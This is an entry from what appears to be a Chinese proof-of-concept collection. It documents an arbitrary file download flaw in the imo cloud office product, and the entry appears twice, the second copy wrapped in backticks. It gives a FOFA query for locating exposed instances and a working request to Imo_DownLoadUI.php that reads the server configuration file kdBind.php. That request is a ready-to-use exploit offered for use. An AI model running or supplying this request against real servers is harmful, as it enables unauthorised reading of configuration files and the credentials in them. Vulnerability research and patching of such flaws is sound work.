Awesome-POC/Web应用漏洞/imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞.md

# imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞

## 漏洞描述

imo 云办公室 由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严，导致可以读取系统敏感文件。

## 漏洞影响

```
imo 云办公室
```

## FOFA

```
app="iMO-云办公室"
```

## 漏洞复现

登录页面

![image-20220524171455819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241714963.png)

验证POC

```
/file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php
```

![image-20220524171627797](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241716860.png)
更新漏洞库：Web应用漏洞/ 2022-05-24 17:29:00 +08:00			`# imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞`

			`## 漏洞描述`

			`imo 云办公室由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严，导致可以读取系统敏感文件。`

			`## 漏洞影响`

			```
			`imo 云办公室`
			```

			`## FOFA`

			```
			`app="iMO-云办公室"`
			```

			`## 漏洞复现`

			`登录页面`

			`![image-20220524171455819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241714963.png)`

			`验证POC`

			```
			`/file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php`
			```

			`![image-20220524171627797](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241716860.png)`